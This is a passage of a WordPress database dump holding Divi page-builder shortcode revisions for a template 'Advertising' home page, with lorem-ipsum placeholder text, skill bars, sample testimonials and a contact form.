button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 21:30:17','2020-07-02 21:30:17','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(173,1,'2020-07-04 21:06:08','2020-07-04 21:06:08','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"28px||78px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"50px||40px|||\" animation_style=\"zoom\" header_font_size_last_edited=\"off|desktop\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" 